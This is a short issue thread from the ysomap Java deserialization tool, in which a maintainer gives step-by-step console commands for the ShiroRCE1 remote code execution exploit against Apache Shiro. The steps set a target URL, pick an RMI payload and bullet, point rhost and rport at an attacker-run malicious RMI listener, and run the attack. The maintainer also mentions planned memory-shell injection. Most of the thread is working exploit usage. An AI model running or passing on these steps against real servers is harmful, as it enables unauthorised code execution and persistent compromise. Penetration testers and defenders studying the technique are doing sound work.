Comments (3)
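The current shiro rce still has some problems; I will be revising it soon. For specific usage, see https://github.com/wh1t3p1g/ysomap/blob/master/scripts/shiro_rce.yso,
It is similar to issue #15. I will write a short introduction later; in the meantime you can look at this script.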
from ysomap.
Hello,
Regarding the questions you raised:
- shiro+jrmp
use exploit ShiroRCE1
set target http://localhost:8080/
set requestMethod GET
use payload RMIConnectWithUnicastRemoteObject
use bullet RMIConnectBullet
set rhost rmi_server_ip
set rport rmi_server_port
run
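In addition, you need to set up a malicious RMI service, such as RMIListener or RMIRefListener.
In this case, there is actually no need to depend on cb or cc.
- About injecting a memory shell
Support for memory shells will be added in the next version (the existing tomcatEcho is not suitable for use with shiro).
The planned form is exploit(ShiroRCE1) payload(cb1) bullet(TemplatesImplBullet)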
from ysomap.
OK, thanks
from ysomap.